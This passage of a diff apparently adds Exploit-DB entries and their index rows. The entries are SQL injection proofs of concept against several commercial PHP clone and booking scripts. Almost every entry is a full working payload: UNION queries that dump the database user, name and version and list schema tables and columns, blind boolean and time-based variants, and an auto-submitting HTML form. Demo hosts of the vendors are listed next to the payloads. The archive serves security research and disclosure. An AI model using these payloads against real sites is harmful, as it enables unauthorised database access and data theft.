+# s'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9,10,11,12,13,14--+-
+# 
+# http://server/search_item.php?search=s'++UNION+ALL+SELECT+1,2,3,4,5,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),7,8,9,10,11,12,13,14--+-
+# 
+# 2)
+# http://localhost/[PATH]/general_item_details.php?id=[SQL]
+# 
+# -34++UNION+ALL+SELECT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+# 
+# http://server/general_item_details.php?id=-34++UNION+ALL+SELECT+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+# 
+# # # # #
--- a/exploits/php/webapps/43261.txt
+++ b/exploits/php/webapps/43261.txt
@ -0,0 +1,46 @@
+# # # # # 
+# Exploit Title: FS Expedia Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/expedia-clone/
+# Demo: http://expedia-clone.demonstration.co.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/show-flight-result.php?fl_orig=[SQL]
+# http://localhost/[PATH]/show-flight-result.php?fl_dest=[SQL]
+# 
+# 25'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+-
+# 
+# http://server/show-flight-result.php?fl_orig=25'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+-
+# 
+# http://server/show-flight-result.php?fl_dest=28'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(25),(26),(27),(28))--+-
+# 
+# 2)
+# http://localhost/[PATH]/pages.php?id=[SQL]
+# 
+# -5++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+# 
+# http://server/pages.php?id=-5++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
+# 
+# 3)
+# http://localhost/[PATH]/content.php?id=[SQL]
+# 
+# -2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))expedia-clone.demonstration.co.in/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))
+# 
+# http://server/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))expedia-clone.demonstration.co.in/content.php?id=-2++UNION(SELECT(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(3),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(5),(6),(7))
+# 
+# # # # #
--- a/exploits/php/webapps/43262.html
+++ b/exploits/php/webapps/43262.html
@ -0,0 +1,30 @@
+<!--
+# # # # # 
+# Exploit Title: FS Foodpanda Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://fortunescripts.com/
+# Software Link: https://fortunescripts.com/product/foodpanda-clone/
+# Demo: http://foodpanda-clone.demonstration.co.in/food/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+-->
+<html>
+<body>
+<form action="http://server/food/" method="post">
+<input type="text" value="' UNION ALL SELECT 1,2,3,CONCAT(0x494853414e2053454e43414e),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Ver Ayari" name="keywords" id="keywords">
+<input type="submit" value="Ver Ayari" onClick= "this.form.submit()">
+</form>
+</body>
+</html>
--- a/exploits/php/webapps/43263.txt
+++ b/exploits/php/webapps/43263.txt
@ -0,0 +1,58 @@
+# # # # # 
+# Exploit Title: Advance B2B Script 2.1.3 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/advance-b2b-script/
+# Demo: http://198.38.86.159/~advancedb2b/
+# Version: 2.1.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/tradeshow-list-detail.php?show_id=[SQL]
+# 
+# -33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
+# 
+# http:/server/tradeshow-list-detail.php?show_id=-33'++UNION+ALL+SELECT+1,(/*!11111Select*/+export_set(5,@:=0,(/*!11111select*/+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!11111table_name*/,0x3c6c693e,2),/*!11111column_name*/,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--+-
+# 
+# Parameter: show_id (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: show_id=33' AND 2728=2728 AND 'YmuO'='YmuO
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 67 columns
+#     Payload: show_id=-3015' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171706b71,0x584943414f617573724e456a6a5369584f53494448646a56596b4a54736670476c424d6b6a4e556b,0x7170707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- pUZl
+# 
+# 2)
+# http://localhost/[PATH]/view-product.php?pid=[SQL]
+# 
+# -1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
+# 
+# http://server/view-product.php?pid=-1555'++UNION+ALL+SELECT+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+-
+# 
+# Parameter: pid (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: pid=1555' AND 2914=2914 AND 'zyef'='zyef
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: pid=1555' AND SLEEP(5) AND 'DubS'='DubS
+# 
+#     Type: UNION query
+#     Title: Generic UNION query (NULL) - 33 columns
+#     Payload: pid=1555' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176706b71,0x4776706c6c514f494a596a436179624947684a6c655163434156506b6d454463737076706d52506d,0x71766b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hHVm
+# 
+# # # # #
--- a/exploits/php/webapps/43264.txt
+++ b/exploits/php/webapps/43264.txt
@ -0,0 +1,54 @@
+# # # # # 
+# Exploit Title: Advance Online Learning Management Script 3.1 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/online-learning-management-script/
+# Demo: http://thavasu.com/demo/online_education/
+# Version: 3.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/courselist.php?subcatid=[SQL]
+# 
+# -9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+# 
+# http://server/courselist.php?subcatid=-9'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+# 
+# Parameter: subcatid (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: subcatid=9' AND 7659=7659 AND 'Akrr'='Akrr
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: subcatid=9' AND SLEEP(5) AND 'DoFl'='DoFl
+# 
+# 2)
+# http://localhost/[PATH]/courselist.php?popcourseid=[SQL]
+# 
+# 1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+# 
+# http://server/courselist.php?popcourseid=1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39))--+-
+# 
+# Parameter: popcourseid (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: popcourseid=1' AND 9182=9182 AND 'vWmu'='vWmu
+# 
+#     Type: AND/OR time-based blind
+#     Title: MySQL >= 5.0.12 AND time-based blind
+#     Payload: popcourseid=1' AND SLEEP(5) AND 'THTz'='THTz
+# 
+# # # # #
--- a/exploits/php/webapps/43265.txt
+++ b/exploits/php/webapps/43265.txt
@ -0,0 +1,30 @@
+# # # # # 
+# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/
+# Demo: http://www.smsemailmarketing.in/demo/Affiliate/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/product-category.php?key=[SQL]
+# 
+# Parameter: key (GET)
+#     Type: boolean-based blind
+#     Title: AND boolean-based blind - WHERE or HAVING clause
+#     Payload: key=a%' AND 5436=5436 AND '%'='
+# 
+# # # # #
--- a/exploits/php/webapps/43266.txt
+++ b/exploits/php/webapps/43266.txt
@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Basic B2B Script 2.0.8 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/professional-b2b-script/
+# Version: 2.0.8
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/product_details.php?id=[SQL]
+# 
+# -348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+--
+# 
+# http://server/product_details.php?id=-348'++/*!13337UNION*/+/*!13337SELECT*/+1,2,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+--
+# 
+# # # # #
--- a/exploits/php/webapps/43267.txt
+++ b/exploits/php/webapps/43267.txt
@ -0,0 +1,36 @@
+# # # # # 
+# Exploit Title: Beauty Parlour Booking Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 08.12.2017
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/beauty-booking-script/
+# Demo: http://fxwebsolution.com/demo/beautyparlour-search/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/list?gender=[SQL]&main_search=
+# 
+# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+# 
+# http://server/beautyparlour-search/list?gender='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
+# 
+# 2)
+# http://localhost/[PATH]/list?city=[SQL]&main_search=
+# 
+# '+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
+# 
+# http://server/beautyparlour-search/list?city='+/*!13337UNION*/+/*!13337SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-&main_search=
+# 
+# # # # #
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -38280,3 +38280,23 @@ id,file,description,date,author,type,platform,port
 43243,exploits/php/webapps/43243.txt,"FS Quibids Clone 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
 43244,exploits/php/webapps/43244.txt,"FS Olx Clone 1.0 - 'scat' / 'pid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
 43245,exploits/php/webapps/43245.txt,"FS Monster Clone 1.0 - 'Employer_Details.php?id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43246,exploits/php/webapps/43246.txt,"FS Makemytrip Clone 1.0 - 'fl_orig' / 'fl_dest' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,80
+43249,exploits/php/webapps/43249.txt,"FS Linkedin Clone 1.0 - 'grid' / 'fid' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43250,exploits/php/webapps/43250.txt,"FS Indiamart Clone 1.0 - 'token' / 'id' / 'c' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43251,exploits/php/webapps/43251.txt,"FS IMDB Clone 1.0 - 'f' / 's' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43252,exploits/php/webapps/43252.html,"FS Grubhub Clone 1.0 - 'keywords' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43253,exploits/php/webapps/43253.txt,"FS Groupon Clone 1.0 - 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43254,exploits/php/webapps/43254.txt,"FS Gigs Script 1.0 - 'cat' / 'sc' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43255,exploits/php/webapps/43255.txt,"FS Freelancer Clone 1.0 - 'profile.php?u' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43256,exploits/php/webapps/43256.txt,"FS Ebay Clone 1.0 - 'id' / 'sub_category_id' / 'category_id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43257,exploits/php/webapps/43257.txt,"FS Crowdfunding Script 1.0 - 'latest_news_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43258,exploits/php/webapps/43258.txt,"FS Care Clone 1.0 - 'jobFrequency' / 'jobType' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43259,exploits/php/webapps/43259.txt,"FS Amazon Clone 1.0 - SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43260,exploits/php/webapps/43260.txt,"FS Trademe Clone 1.0 - 'search' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43261,exploits/php/webapps/43261.txt,"FS Expedia Clone 1.0 - 'fl_orig' / 'fl_dest' / 'id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43262,exploits/php/webapps/43262.html,"FS Foodpanda Clone 1.0 - SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43263,exploits/php/webapps/43263.txt,"Advance B2B Script 2.1.3 - 'show_id' / 'pid' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43264,exploits/php/webapps/43264.txt,"Advance Online Learning Management Script 3.1 - 'subcatid' / 'popcourseid' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43266,exploits/php/webapps/43266.txt,"Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80
+43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80